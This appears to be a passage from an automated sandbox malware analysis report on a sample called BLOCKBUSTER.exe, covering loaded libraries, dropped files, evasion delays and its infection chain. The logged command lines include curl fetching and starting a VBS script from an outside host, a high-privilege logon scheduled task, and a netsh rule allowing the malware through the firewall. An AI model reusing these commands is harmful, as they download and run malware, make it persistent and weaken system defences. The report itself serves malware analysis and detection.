Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: profapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: edputil.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: appresolver.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: bcp47langs.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: slc.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: userenv.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: sppc.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\_6720bdf2272bc\7zxa.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\_6720bdf2272bc\unrar.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\_6720bdf2272bc\BLOCKBUSTER.exe			Jump to dropped file

Boot Survival

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe

Window / User API: threadDelayed 1444

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep count: 1444 > 30
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1732800000s >= -30000s
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144	Thread sleep time: -1200000s >= -30000s

Source: C:\Windows\SysWOW64\wscript.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe

Process information queried: ProcessInformation

Anti Debugging

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 109.234.39.156 80

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any